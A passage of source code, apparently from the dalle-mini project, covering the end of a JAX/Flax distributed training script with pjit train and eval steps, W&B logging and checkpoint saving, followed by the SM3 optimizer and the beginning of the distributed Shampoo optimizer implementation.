available yet def maybe_init_params(params): if params is not None: # model params are correctly loaded return params else: # params have not been initialized yet return model.init_weights(model.key, model.input_shape) with mesh: logger.info(" Creating state") # restore metadata attr_state = {} keys = ["train_time", "train_samples"] if model_args.restore_state: keys += ["step", "epoch"] attr_state = {k: v for k, v in model_metadata.items() if k in keys} if not model_args.restore_state: def init_state(params): return TrainState.create( apply_fn=model.__call__, tx=optimizer, params=maybe_init_params(params), dropout_rng=dropout_rng, **attr_state, ) state = pjit( init_state, in_axis_resources=(param_spec,) if model_args.model_name_or_path else None, out_axis_resources=state_spec, donate_argnums=(0,), )(params) else: # load opt_state opt_state = from_bytes(opt_state_shape, model_args.get_opt_state()) def restore_state(params, opt_state): return TrainState( apply_fn=model.__call__, tx=optimizer, params=params, opt_state=opt_state, dropout_rng=dropout_rng, **attr_state, ) state = pjit( restore_state, in_axis_resources=( param_spec, opt_state_spec, ), out_axis_resources=state_spec, donate_argnums=(0, 1), )(params, opt_state) # remove opt_state from CPU del opt_state # free CPU memory del params, opt_state_spec, opt_state_shape # define batch specs batch_spec = PartitionSpec("dp") grad_batch_spec = PartitionSpec(None, "dp") # define loss def loss_fn(logits, labels): loss = optax.softmax_cross_entropy(logits, onehot(labels, logits.shape[-1])) loss = loss.mean() return loss # "vmap trick" avoids a crash when mp_devices > 1 (not sure why it happens) # lead to better perf: see https://wandb.ai/dalle-mini/dalle-mini/reports/JAX-pmap-vs-pjit--VmlldzoxNDg1ODA2 use_vmap_trick = training_args.use_vmap_trick # make grad_param_spec for vmap if use_vmap_trick: grad_param_spec = jax.tree_util.tree_map( lambda x: PartitionSpec(*("dp",) + (x if x is not None else (None,))), param_spec, ) # Define gradient update step fn def train_step(state, batch, train_time): # get a minibatch (one gradient accumulation slice) def get_minibatch(batch, grad_idx): return jax.tree_util.tree_map( lambda x: jax.lax.dynamic_index_in_dim(x, grad_idx, keepdims=False), batch, ) def compute_loss(params, minibatch, dropout_rng): # minibatch has dim (batch_size, ...) 
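            # flax's FrozenDict.pop returns a (dict_without_key, value) pair: the labels are
            # split off here and the remaining entries are passed to the model as keyword inputs.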
minibatch, labels = minibatch.pop("labels") logits = state.apply_fn( **minibatch, params=params, dropout_rng=dropout_rng, train=True )[0] return loss_fn(logits, labels) grad_fn = jax.value_and_grad(compute_loss) def loss_and_grad(grad_idx, dropout_rng): # minibatch at grad_idx for gradient accumulation (None otherwise) minibatch = ( get_minibatch(batch, grad_idx) if grad_idx is not None else batch ) # ensure it is sharded properly minibatch = with_sharding_constraint(minibatch, batch_spec) # only 1 single rng per grad step, let us handle larger batch size (not sure why) dropout_rng, _ = jax.random.split(dropout_rng) if use_vmap_trick: # "vmap trick", calculate loss and grads independently per dp_device loss, grads = jax.vmap( grad_fn, in_axes=(None, 0, None), out_axes=(0, 0) )(state.params, minibatch, dropout_rng) # ensure they are sharded correctly loss = with_sharding_constraint(loss, batch_spec) grads = with_sharding_constraint(grads, grad_param_spec) # average across all devices # Note: we could average per device only after gradient accumulation, right before params update loss, grads = jax.tree_util.tree_map( lambda x: jnp.mean(x, axis=0), (loss, grads) ) else: # "vmap trick" does not work in multi-hosts and requires too much hbm loss, grads = grad_fn(state.params, minibatch, dropout_rng) # ensure grads are sharded grads = with_sharding_constraint(grads, param_spec) # return loss and grads return loss, grads, dropout_rng if training_args.gradient_accumulation_steps == 1: loss, grads, dropout_rng = loss_and_grad(None, state.dropout_rng) else: # create initial state for cumul_minibatch_step loop init_minibatch_step = ( 0.0, with_sharding_constraint( jax.tree_util.tree_map(jnp.zeros_like, state.params), param_spec ), state.dropout_rng, ) # accumulate gradients def cumul_minibatch_step(grad_idx, cumul_loss_grad_dropout): cumul_loss, cumul_grads, dropout_rng = cumul_loss_grad_dropout loss, grads, dropout_rng = loss_and_grad(grad_idx, dropout_rng) cumul_loss, cumul_grads = jax.tree_util.tree_map( jnp.add, (cumul_loss, cumul_grads), (loss, grads) ) cumul_grads = with_sharding_constraint(cumul_grads, param_spec) return cumul_loss, cumul_grads, dropout_rng # loop over gradients loss, grads, dropout_rng = jax.lax.fori_loop( 0, training_args.gradient_accumulation_steps, cumul_minibatch_step, init_minibatch_step, ) grads = with_sharding_constraint(grads, param_spec) # sum -> mean loss, grads = jax.tree_util.tree_map( lambda x: x / training_args.gradient_accumulation_steps, (loss, grads) ) grads = with_sharding_constraint(grads, param_spec) # update state state = state.apply_gradients( grads=grads, dropout_rng=dropout_rng, train_time=train_time, train_samples=state.train_samples + batch_size_per_step, ) metrics = { "loss": loss, "learning_rate": learning_rate_fn(state.step), } def maybe_fn(fn, val, zeros, freq): """Call fn only if it is a logging step""" return jax.lax.cond( state.step % freq == 0, fn, lambda _: zeros, val, ) # log additional metrics params = trainable_params(state.params, training_args.embeddings_only) grads = trainable_params(grads, training_args.embeddings_only) if training_args.log_norm_steps: zeros_norm = jax.tree_util.tree_map(lambda _: jnp.float32(0), params) def norm(val): return jax.tree_util.tree_map(lambda x: jnp.linalg.norm(x), val) gradients_norm = maybe_fn( norm, grads, zeros_norm, training_args.log_norm_steps ) params_norm = maybe_fn( norm, params, zeros_norm, training_args.log_norm_steps ) metrics.update( { "gradients_norm": gradients_norm, "params_norm": 
params_norm, } ) if training_args.log_histogram_steps: zeros_hist = jax.tree_util.tree_map( lambda _: jnp.histogram(jnp.zeros(1), density=True), params ) def histogram(val): return jax.tree_util.tree_map( lambda x: jnp.histogram(x, density=True), val ) gradients_hist = maybe_fn( histogram, grads, zeros_hist, training_args.log_histogram_steps ) params_hist = maybe_fn( histogram, params, zeros_hist, training_args.log_histogram_steps ) metrics.update( { "params_hist": params_hist, "gradients_hist": gradients_hist, } ) return state, metrics # Define eval fn eval_model = ( model if model_args.dtype == "float32" else DalleBart( model.config, seed=training_args.seed_model, dtype=jnp.float32, _do_init=False, ) ) def eval_step(state, batch): def compute_eval_loss(batch): batch, labels = batch.pop("labels") logits = eval_model(**batch, params=state.params, train=False)[0] return loss_fn(logits, labels) if use_vmap_trick: loss = jax.vmap(compute_eval_loss)(batch) # ensure they are sharded correctly loss = with_sharding_constraint(loss, batch_spec) # average across all devices loss = jnp.mean(loss) else: loss = compute_eval_loss(batch) return loss # Create parallel version of the train and eval step p_train_step = pjit( train_step, in_axis_resources=( state_spec, grad_batch_spec if training_args.gradient_accumulation_steps > 1 else batch_spec, None, ), out_axis_resources=(state_spec, None), donate_argnums=(0,), ) p_eval_step = pjit( eval_step, in_axis_resources=(state_spec, batch_spec), out_axis_resources=None, ) # define metrics logger class MetricsLogger: def __init__(self, step): # keep state self.state_dict = {} # estimate speed self.step = step self.time = time.perf_counter() self.offset_time = 0.0 def update_state_metrics(self, state): """Update internal state metrics (logged at each call to be used as x-axis)""" self.state_dict = { f'train/{k.split("_")[-1]}': state[k] for k in ["step", "epoch", "train_time", "train_samples"] } # timing metrics new_step = int(state["step"]) new_time = time.perf_counter() if new_step > self.step: # remove time for eval & save delta_time = new_time - self.time - self.offset_time self.offset_time = 0 time_per_step = delta_time / (new_step - self.step) self.step = new_step self.time = new_time self.log_time("train_per_step", time_per_step, offset=False) self.log_time("train_per_log", delta_time, offset=False) def log_time(self, key, duration, offset=True): if jax.process_index() == 0: wandb.log({f"time/{key}": duration, **self.state_dict}) if offset: self.offset_time += duration def log(self, metrics, prefix=None): if jax.process_index() == 0: log_metrics = {} for k, v in metrics.items(): if "_norm" in k: if self.step % training_args.log_norm_steps == 0: log_metrics[f"{k}/"] = unfreeze(v) elif "_hist" in k: if self.step % training_args.log_histogram_steps == 0: v = jax.tree_util.tree_map( lambda x: jax.device_get(x), unfreeze(v) ) v = jax.tree_util.tree_map( lambda x: wandb.Histogram(np_histogram=x), v, is_leaf=lambda x: isinstance(x, tuple), ) log_metrics[f"{k}/"] = v else: if prefix is not None: k = f"{prefix}/{k}" log_metrics[k] = v wandb.log({**log_metrics, **self.state_dict}) # keep local copy of state local_state = { k: jax.device_get(getattr(state, k)).item() for k in ["step", "epoch", "train_time", "train_samples"] } # init variables start_time = time.perf_counter() - local_state["train_time"] train_metrics = None evaluation_ran = False save_model_ran = False metrics_logger = MetricsLogger(local_state["step"]) epochs = tqdm( range(local_state["epoch"], 
num_epochs), desc=f"Epoch ... (1/{num_epochs})", position=0, disable=jax.process_index() > 0, ) def run_evaluation(): # ======================== Evaluating ============================== if training_args.do_eval: start_eval_time = time.perf_counter() # get validation datasets val_datasets = list( dataset.other_eval_datasets.keys() if hasattr(dataset, "other_eval_datasets") else [] ) val_datasets += ["eval"] for val_dataset in val_datasets: eval_loader = dataset.dataloader( val_dataset, eval_batch_size_per_step * max(1, training_args.mp_devices // jax.local_device_count()), ) eval_steps = ( len_eval_dataset // eval_batch_size_per_step if len_eval_dataset is not None else None ) eval_loss = [] for batch in tqdm( eval_loader, desc="Evaluating...", position=2, leave=False, total=eval_steps, disable=jax.process_index() > 0, ): # need to keep only eval_batch_size_per_node items relevant to the node batch = jax.tree_util.tree_map( lambda x: x.reshape( (jax.process_count(), eval_batch_size_per_node) + x.shape[1:] ), batch, ) batch = jax.tree_util.tree_map( lambda x: x[jax.process_index()], batch ) # add dp dimension when using "vmap trick" if use_vmap_trick: bs_shape = ( jax.local_device_count() // training_args.mp_devices, training_args.per_device_eval_batch_size, ) batch = jax.tree_util.tree_map( lambda x: x.reshape(bs_shape + x.shape[1:]), batch ) # freeze batch to pass safely to jax transforms batch = freeze(batch) # accumulate losses async eval_loss.append(p_eval_step(state, batch)) # get the mean of the loss eval_loss = jnp.stack(eval_loss) eval_loss = jnp.mean(eval_loss) eval_metrics = {"loss": eval_loss} # log metrics metrics_logger.log(eval_metrics, prefix=val_dataset) # Print metrics and update progress bar desc = f"Epoch... ({epoch + 1}/{num_epochs} | {val_dataset} Loss: {eval_metrics['loss']})" epochs.write(desc) epochs.desc = desc # log time metrics_logger.log_time("eval", time.perf_counter() - start_eval_time) return eval_metrics def run_save_model(state, eval_metrics=None): if jax.process_index() == 0: start_save_time = time.perf_counter() output_dir = training_args.output_dir use_bucket = output_dir.startswith("gs://") if use_bucket: bucket_path = Path(output_dir[5:]) / wandb.run.id / f"step_{state.step}" bucket, dir_path = str(bucket_path).split("/", 1) tmp_dir = tempfile.TemporaryDirectory() output_dir = tmp_dir.name # save model params = jax.device_get(state.params) model.save_pretrained( output_dir, params=params, ) # save tokenizer tokenizer.save_pretrained(output_dir) # copy to bucket if use_bucket: client = storage.Client() bucket = client.bucket(bucket) for filename in Path(output_dir).glob("*"): blob_name = str(Path(dir_path) / "model" / filename.name) blob = bucket.blob(blob_name) blob.upload_from_filename(str(filename)) tmp_dir.cleanup() # save state opt_state = jax.device_get(state.opt_state) if use_bucket: blob_name = str(Path(dir_path) / "state" / "opt_state.msgpack") blob = bucket.blob(blob_name) blob.upload_from_file(io.BytesIO(to_bytes(opt_state))) else: with (Path(output_dir) / "opt_state.msgpack").open("wb") as f: f.write(to_bytes(opt_state)) # save to W&B if training_args.log_model: # save some space c = wandb.wandb_sdk.wandb_artifacts.get_artifacts_cache() c.cleanup(wandb.util.from_human_size("20GB")) metadata = { k: jax.device_get(getattr(state, k)).item() for k in ["step", "epoch", "train_time", "train_samples"] } metadata["num_params"] = num_params if eval_metrics is not None: metadata["eval"] = eval_metrics # create model artifact if use_bucket: 
metadata["bucket_path"] = f"gs://{bucket_path}/model" artifact = wandb.Artifact( name=f"model-{wandb.run.id}", type="DalleBart_model", metadata=metadata, ) if use_bucket: artifact.add_reference(metadata["bucket_path"]) else: for filename in [ "config.json", "flax_model.msgpack", "merges.txt", "special_tokens_map.json", "tokenizer.json", "tokenizer_config.json", "vocab.json", ]: artifact.add_file( f"{Path(training_args.output_dir) / filename}" ) wandb.run.log_artifact(artifact) # create state artifact if use_bucket: metadata["bucket_path"] = f"gs://{bucket_path}/state" artifact_state = wandb.Artifact( name=f"state-{wandb.run.id}", type="DalleBart_state", metadata=metadata, ) if use_bucket: artifact_state.add_reference(metadata["bucket_path"]) else: artifact_state.add_file( f"{Path(training_args.output_dir) / 'opt_state.msgpack'}" ) wandb.run.log_artifact(artifact_state) metrics_logger.log_time("save_model", time.perf_counter() - start_save_time) logger.info(" Ready to start training") with mesh: for epoch in epochs: state = state.replace(epoch=epoch) local_state["epoch"] = epoch # ======================== Training ================================ metrics_logger.update_state_metrics(local_state) metrics_logger.log({}) if training_args.do_train: # load data - may be replicated on multiple nodes node_groups = max( 1, training_args.mp_devices // jax.local_device_count() ) loader_bs = batch_size_per_node * node_groups train_loader = dataset.dataloader( "train", loader_bs, epoch, ) # train for batch in tqdm( train_loader, desc="Training...", position=1, leave=False, total=steps_per_epoch, disable=jax.process_index() > 0, ): # calculate delta time (we have a lag of one step but it's ok) train_time = time.perf_counter() - start_time # reset control variables evaluation_ran = False save_model_ran = False # set correct shape to batch # - add grad_step dim if gradient_accumulation_steps > 1 bs_shape = ( (batch_size_per_node_per_grad_step * node_groups,) if not use_vmap_trick else ( jax.local_device_count() * node_groups // training_args.mp_devices, # local dp devices training_args.per_device_train_batch_size, ) ) if training_args.gradient_accumulation_steps > 1: # reshape data into (gradient_accumulation_steps, batch_per_node, ...) # to avoid any data redistribution when sharding bs_shape = ( training_args.gradient_accumulation_steps, ) + bs_shape # reshape batch batch = jax.tree_util.tree_map( lambda x: x.reshape(bs_shape + x.shape[1:]), batch, ) # freeze batch to pass safely to jax transforms batch = freeze(batch) # train step state, train_metrics = p_train_step(state, batch, train_time) local_state["step"] += 1 local_state["train_time"] = train_time local_state["train_samples"] += batch_size_per_step if ( local_state["step"] % training_args.logging_steps == 0 and jax.process_index() == 0 ): metrics_logger.update_state_metrics(local_state) metrics_logger.log(train_metrics, prefix="train") eval_metrics = None if local_state["step"] % training_args.eval_steps == 0: eval_metrics = run_evaluation() evaluation_ran = True if local_state["step"] % training_args.save_steps == 0: run_save_model(state, eval_metrics) save_model_ran = True # log final train metrics if train_metrics is not None: metrics_logger.update_state_metrics(local_state) metrics_logger.log(train_metrics, prefix="train") epochs.write( f"Epoch... 
({epoch + 1}/{num_epochs} | Loss: {train_metrics['loss']}, Learning Rate: {train_metrics['learning_rate']})" ) # Final evaluation at the end of each epoch if not evaluation_ran: eval_metrics = run_evaluation() # save checkpoint after each epoch if not save_model_ran: run_save_model(state, eval_metrics) if __name__ == "__main__": main() File: tools/train/scalable_shampoo/sm3.py # coding=utf-8 # Copyright 2022 The Google Research Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # An implementation of SM3 from: # # Memory-Efficient Adaptive Optimization, https://arxiv.org/pdf/1901.11150.pdf # Rohan Anil, Vineet Gupta, Tomer Koren, Yoram Singer # # Author: Rohan Anil (rohananil at google dot com) # """SM3 Implementation.""" import functools from typing import Any, NamedTuple import chex import jax import jax.numpy as jnp import optax from .quantization_utils import QuantizedValue class SM3State(NamedTuple): count: chex.Array stats: Any # Per parameter optimizer state used in data-parallel training. class ParameterStats(NamedTuple): """State associated to each parameter of the model being trained.""" diagonal_statistics: chex.Array # Accumulator for diagonal preconditioner diagonal_momentum: QuantizedValue # Momentum for the diagonal preconditioner def sm3( learning_rate, beta1=0.9, beta2=0.999, diagonal_epsilon=1e-10, normalize_grads=False ): """SM3 optimizer. Memory-Efficient Adaptive Optimization, Rohan Anil, Vineet Gupta, Tomer Koren, Yoram Singer https://arxiv.org/abs/1901.11150 Args: learning_rate: the step size used to update the parameters. beta1: momentum parameter. beta2: second moment averaging parameter. diagonal_epsilon: epsilon for sm3 normalize_grads: Whether to normalize grads. Author finds it useful when grads are high variance. Returns: a GradientTransformation. """ def _quantize_momentum(momentum_statistics): return QuantizedValue.from_float_value(momentum_statistics, jnp.int8) def init_fn(params): """Initialise the optimiser's state.""" def _init(param): accumulators = [jnp.zeros([s]) for s in param.shape] momentum = _quantize_momentum(jnp.zeros_like(param)) return ParameterStats(accumulators, momentum) return SM3State( count=jnp.zeros([], jnp.int32), stats=jax.tree_map(_init, params) ) def _get_expanded_shape(shape, i): rank = len(shape) # Replaces a `shape` of [M, N, K] with 1 in all dimensions except for i. # For eg: i = 1 returns [1, N, 1]. 
return [1] * i + [shape[i]] + [1] * (rank - i - 1) def _moving_averages(grad, accumulators): w = (1.0 - beta2) if beta2 != 1.0 else 1.0 if grad.ndim < 2: return beta2 * accumulators[0] + w * grad**2 else: min_accumulator = functools.reduce(jnp.minimum, accumulators) return beta2 * min_accumulator + w * grad**2 def _moving_averages_momentum(grad, momentum): w = (1.0 - beta1) if beta1 != 1.0 else 1.0 return beta1 * momentum.to_float() + w * grad def _sketch_diagonal_statistics(grad, updated_diagonal_statistics): all_diagonal_statistics = [] for i in range(grad.ndim): axes = list(range(i)) + list(range(i + 1, grad.ndim)) dim_diagonal_statistics = jnp.max(updated_diagonal_statistics, axis=axes) all_diagonal_statistics.append(dim_diagonal_statistics) if grad.ndim == 1: all_diagonal_statistics[0] = updated_diagonal_statistics return all_diagonal_statistics def update_fn(updates, state, params=None): del params stats = state.stats if normalize_grads: updates = jax.tree_map(lambda g: g / (jnp.linalg.norm(g) + 1e-16), updates) # Reshape all vectors into N-d tensors to compute min over them. # [n], [m] -> [n, 1], [1, m] expanded_diagonal_statistics = jax.tree_map( lambda grad, state: [ # pylint:disable=g-long-lambda jnp.reshape( state.diagonal_statistics[i], _get_expanded_shape(grad.shape, i) ) for i in range(grad.ndim) ], updates, stats, ) # Compute new diagonal statistics new_diagonal_statistics = jax.tree_map( _moving_averages, updates, expanded_diagonal_statistics ) # Compute preconditioners (1/sqrt(s)) where s is the statistics. new_preconditioners = jax.tree_map( lambda t: 1.0 / jnp.sqrt(t + diagonal_epsilon), new_diagonal_statistics ) preconditioned_grads = jax.tree_map( lambda g, p: g * p, updates, new_preconditioners ) # Compute updated momentum (also handle quantization) updated_momentum = jax.tree_map( lambda preconditioned_grad, state: _moving_averages_momentum( # pylint:disable=g-long-lambda preconditioned_grad, state.diagonal_momentum ), preconditioned_grads, stats, ) # Update diagonal statistics. updated_diagonal_statistics = jax.tree_map( _sketch_diagonal_statistics, updates, new_diagonal_statistics ) # Update momentum. new_sm3_stats = jax.tree_map( lambda momentum, diagonal_stats: ParameterStats( # pylint:disable=g-long-lambda diagonal_stats, _quantize_momentum(momentum) ), updated_momentum, updated_diagonal_statistics, ) lr = learning_rate if callable(learning_rate): lr = learning_rate(state.count) new_updates = jax.tree_map(lambda pg: -lr * pg, updated_momentum) return new_updates, SM3State(count=state.count + 1, stats=new_sm3_stats) return optax.GradientTransformation(init_fn, update_fn) File: tools/train/scalable_shampoo/distributed_shampoo.py # coding=utf-8 # Copyright 2022 The Google Research Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
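# Note: this module is consumed by tools/train/train.py above, which constructs the optimizer
# via distributed_shampoo(...) with the block size, grafting type, and partition specs taken
# from its TrainingArguments.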
# An implementation of distributed Shampoo optimizer from: # # Scalable Second Order Optimization for Deep Learning # Rohan Anil, Vineet Gupta, Tomer Koren, Kevin Regan, Yoram Singer # Preprint Paper: https://arxiv.org/abs/2002.09018 # # This implementation moves computation of inverse pth root back to the # accelerator (if higher precision is available). # # Authors: Rohan Anil (rohananil at google dot com) # Vineet Gupta (vineet at google dot com) # James Lottes (jlottes at google dot com) # Anudhyan Boral (anudhyan at google dot com) # """Distributed Shampoo Implementation.""" import enum import functools import itertools from typing import Any, Callable, List, NamedTuple, Optional, Tuple, Union import chex import jax import jax.numpy as jnp import numpy as np import optax from absl import logging from flax import struct from jax import lax from jax.experimental import pjit from jax.experimental.sparse import linalg from .quantization_utils import QuantizedValue from .symmetric_matrices import symmetric_matrices # Dtype for inverse-pth root routine # Switch to f64 if you have hardware that supports it. Enable the jax flag # jax_enable_x64 for this to work, otherwise it will default to float32. _MAT_INV_PTH_ROOT_DTYPE = jnp.float64 @struct.dataclass class TrainingMetrics: inverse_pth_root_errors: chex.Array # Error for inverse-pth roots. # TODO(rohananil): Add more important metrics to track during training. # Per parameter optimizer state used in data-parallel training. class ParameterStats(NamedTuple): """State associated to each parameter of the model being trained.""" diagonal_statistics: QuantizedValue # Accumulator for diagonal preconditioner statistics: List[Any] # Statistics (QuantizedValue, chex.Array) preconditioners: List[Any] # Preconditioners (QuantizedValue, chex.Array) diagonal_momentum: QuantizedValue # Momentum for the diagonal preconditioner momentum: QuantizedValue # Momentum for the shampoo preconditioner training_metrics: TrainingMetrics # Metrics (optional for training). # For training extremely large model; We keep a global state with a concatenated # statistics and preconditioner states for all vars. This is so that we can # annotate the leading axis to be sharded to save memory at the cost of # communication. @struct.dataclass class GlobalShardedParameterStats: statistics: chex.Array # Statistics preconditioners: chex.Array # Preconditioners exponents: chex.Array # exponents # These are per-parameter local states; All statistics here mirror the parameter # Thus the sharding is copied over from the param specification. @struct.dataclass class LocalShardedParameterStats: """State associated to each parameter of the model being trained.""" diagonal_statistics: QuantizedValue # Accumulator for diagonal preconditioner diagonal_momentum: QuantizedValue # Momentum for the diagonal preconditioner momentum: QuantizedValue # Momentum for the shampoo preconditioner training_metrics: TrainingMetrics # Metrics (optional for training). index_start: np.int32 = struct.field( pytree_node=False ) # Index into global statistics array sizes: Any = struct.field(pytree_node=False) # Sizes of the statistics. def init_training_metrics(num_statistics): # Since the downstream apis expect a jnp.array - we create a dummy one if # num_statistics=0. 
if not num_statistics: return TrainingMetrics(jnp.array(0, jnp.float32)) else: return TrainingMetrics(jnp.zeros([num_statistics], jnp.float32)) def init_training_metrics_shapes(num_statistics): # Since the downstream apis expect a jnp.array - we create a dummy one if # num_statistics=0. if not num_statistics: return TrainingMetrics([[], jnp.float32]) else: return TrainingMetrics([[num_statistics], jnp.float32]) def init_training_metrics_pspec(): return TrainingMetrics(pjit.PartitionSpec()) class ShardedShampooStats(NamedTuple): """Shampoo state in sharded mode.""" global_stats: Any local_stats: Any class ShampooState(NamedTuple): count: chex.Array stats: Any class InitFnState(NamedTuple): init_fn: Any pspec_fn: Any shape_and_dtype_fn: Any class GraftingType(enum.IntEnum): SGD = 1 ADAGRAD = 2 RMSPROP = 3 RMSPROP_NORMALIZED = 4 SQRT_N = 5 ADAGRAD_NORMALIZED = 6 class PreconditionerType(enum.IntEnum): # Default, computes preconditioner for each dim ALL = 1 # One sided Shampoo, in this cases only on input dim. # Assumes last dim is always the output dim and everything else input dim. INPUT = 2 def power_iteration( matrix, num_iters=100, error_tolerance=1e-6, precision=lax.Precision.HIGHEST, ): r"""Power iteration algorithm. The power iteration algorithm takes a symmetric PSD matrix `A`, and produces a scalar `\lambda` , which is the greatest (in absolute value) eigenvalue of `A`, and a vector v, which is the corresponding eigenvector of `A`. References: [Wikipedia, 2021](https://en.wikipedia.org/wiki/Power_iteration) Args: matrix: the symmetric PSD matrix. num_iters: Number of iterations. error_tolerance: Iterative exit condition. precision: precision XLA related flag, the available options are: a) lax.Precision.DEFAULT (better step time, but not precise) b) lax.Precision.HIGH (increased precision, slower) c) lax.Precision.HIGHEST (best possible precision, slowest) Returns: eigen vector, eigen value """ matrix_size = matrix.shape[-1] def _iter_condition(state): i, unused_v, unused_s, unused_s_v, run_step = state return jnp.logical_and(i < num_iters, run_step) def _iter_body(state): """One step of power iteration.""" i, new_v, s, s_v, unused_run_step = state new_v = new_v / jnp.linalg.norm(new_v) s_v = jnp.einsum("ij,j->i", matrix, new_v, precision=precision) s_new = jnp.einsum("i,i->", new_v, s_v, precision=precision) return ( i + 1, s_v, s_new, s_v, jnp.greater(jnp.abs(s_new - s), error_tolerance), ) # Figure out how to use step as seed for random. v_0 = ( np.random.RandomState(1729).uniform(-1.0, 1.0, matrix_size).astype(matrix.dtype) ) init_state = tuple([0, v_0, jnp.zeros([], dtype=matrix.dtype), v_0, True]) _, v_out, s_out, _, _ = lax.while_loop(_iter_condition, _iter_body, init_state) v_out = v_out / jnp.linalg.norm(v_out) return v_out, s_out def mat_power( mat_m, p, precision=lax.Precision.HIGHEST, ): """A simple matrix power method. 
M^p where p can be TracedValue.""" power = jnp.eye(mat_m.shape[0], dtype=_MAT_INV_PTH_ROOT_DTYPE) def _iter_condition(state): i, _, _ = state return i > 0 def _iter_body(state): i, power, mat = state power = jax.lax.cond( i % 2 == 1, lambda: jnp.matmul(mat, power, precision=precision), lambda: power, ) i //= 2 mat = jnp.matmul(mat, mat, precision=precision) return i, power, mat _, result, _ = lax.while_loop(_iter_condition, _iter_body, (p, power, mat_m)) return result def _pth_root_difference(w, alpha, beta, p): """Computes (w+alpha)^(-1/p)-(w+beta)^(-1/p).""" a = w + alpha b = w + beta a_minus_b = alpha - beta exp = -1 / p def _stable_subtract(b, a_minus_b): # Mathematically identical to the target expression, with (w+beta)^(-1/p) # term factored out and w cancellation in the subtraction. return (b**exp) * jnp.expm1(exp * jnp.log1p(a_minus_b / b)) return jnp.where( # Choose the branch with the best log1p approximation. jnp.abs(a_minus_b / b) < jnp.abs(a_minus_b / a), -_stable_subtract(a, -a_minus_b), _stable_subtract(b, a_minus_b), ) def matrix_inverse_pth_root( matrix, p, num_iters=100, ridge_epsilon=1e-6, error_tolerance=1e-6, precision=lax.Precision.HIGHEST, relative_matrix_epsilon=True, lobpcg_topk_precondition=0, lobpcg_max_iter=0, ): """Computes `matrix^(-1/p)`, where `p` is a positive integer. This function uses the Coupled newton iterations algorithm for the computation of a matrix's inverse pth root. References: [Functions of Matrices, Theory and Computation, Nicholas J Higham, Pg 184, Eq 7.18]( https://epubs.siam.org/doi/book/10.1137/1.9780898717778) Args: matrix: the symmetric PSD matrix whose power it to be computed p: exponent, for p a positive integer. num_iters: Maximum number of iterations. ridge_epsilon: Ridge epsilon added to make the matrix positive definite. error_tolerance: Error indicator, useful for early termination. precision: precision XLA related flag, the available options are: a) lax.Precision.DEFAULT (better step time, but not precise) b) lax.Precision.HIGH (increased precision, slower) c) lax.Precision.HIGHEST (best possible precision, slowest) relative_matrix_epsilon: Whether to use relative epsilon to the max eigen value when computing inverse-pth root. lobpcg_topk_precondition: If nonzero, specifies the number of top eigenvectors to subtract out before performing LOBPCG. Note this makes relative_matrix_epsilon essentially free. lobpcg_max_iter: Maximum iteration count for LOBPCG, defaults to `lobpcg_topk_precondition`. Returns: matrix^(-1/p) and the error """ # If the input is not square, materialize it from the concatenated form. if matrix.shape[0] != matrix.shape[1]: matrix = symmetric_matrices.materialize_matrix_from_concat(matrix) assert matrix.shape[0] == matrix.shape[1] # We use _MAT_INV_PTH_ROOT_DTYPE for the matrix inverse pth root. # Switch to f64 if you have hardware that supports it. Enable the jax flag # jax_enable_x64 for this to work. 
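    # Rough sketch of the coupled Newton iteration implemented below (see the
    # Higham reference in the docstring): with alpha = -1/p, start from
    #   M_0 = z * (matrix + ridge_epsilon * I),   H_0 = z**(1/p) * I,
    # and repeat
    #   T_k     = (1 - alpha) * I + alpha * M_k = ((p + 1) * I - M_k) / p
    #   M_{k+1} = T_k**p @ M_k,    H_{k+1} = H_k @ T_k.
    # All iterates are polynomials in the damped matrix and therefore commute,
    # so H_k**p @ (damped matrix) == M_k at every step; driving M_k -> I thus
    # drives H_k -> (damped matrix)**(-1/p).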
matrix_size = matrix.shape[0] orig_dtype = matrix.dtype matrix = matrix.astype(_MAT_INV_PTH_ROOT_DTYPE) alpha = jnp.asarray(-1.0 / p, _MAT_INV_PTH_ROOT_DTYPE) identity = jnp.eye(matrix_size, dtype=_MAT_INV_PTH_ROOT_DTYPE) original_matrix = matrix if lobpcg_topk_precondition > 0: # TODO(vladf): reuse previous top-k as the initial search directions pad_shape = (matrix_size - lobpcg_topk_precondition, lobpcg_topk_precondition) search_dirs = jnp.concatenate( (jnp.eye(lobpcg_topk_precondition), jnp.zeros(pad_shape)), axis=0 ) eigvals, eigvecs, actual_iters = linalg.lobpcg_standard( matrix, search_dirs, lobpcg_topk_precondition if lobpcg_max_iter == 0 else lobpcg_max_iter, ) del actual_iters # TODO(vladf): return diagnostics dictionary # The minimal eigenvalue among top-k becomes the maximal one in the whole # matrix after deflation. max_ev = jnp.min(eigvals) deflation = eigvals - max_ev scaled_vecs = eigvecs * jnp.sqrt(deflation) # Deflate out top eigenvectors to reduce matrix condition number. matrix -= scaled_vecs.dot(scaled_vecs.T, precision=jax.lax.Precision.HIGHEST) # Only use power iteration if lobpcg wasn't already used to derive the # top eigenvalue. elif relative_matrix_epsilon: _, max_ev = power_iteration( matrix=matrix, num_iters=100, error_tolerance=1e-6, precision=precision ) eigvals, eigvecs = None, None # Unused but required by pytype. # Use absolute matrix epsilon scaling otherwise. else: max_ev = 1.0 eigvals, eigvecs = None, None # Unused but required by pytype. ridge_epsilon = ridge_epsilon * jnp.maximum(max_ev, 1e-6) def _iter_condition(state): (i, unused_mat_m, unused_mat_h, unused_old_mat_h, error, run_step) = state error_above_threshold = jnp.logical_and(error > error_tolerance, run_step) return jnp.logical_and(i < num_iters, error_above_threshold) def _iter_body(state): (i, mat_m, mat_h, unused_old_mat_h, error, unused_run_step) = state mat_m_i = (1 - alpha) * identity + alpha * mat_m new_mat_m = jnp.matmul(mat_power(mat_m_i, p), mat_m, precision=precision) new_mat_h = jnp.matmul(mat_h, mat_m_i, precision=precision) new_error = jnp.max(jnp.abs(new_mat_m - identity)) # sometimes error increases after an iteration before decreasing and # converging. 1.2 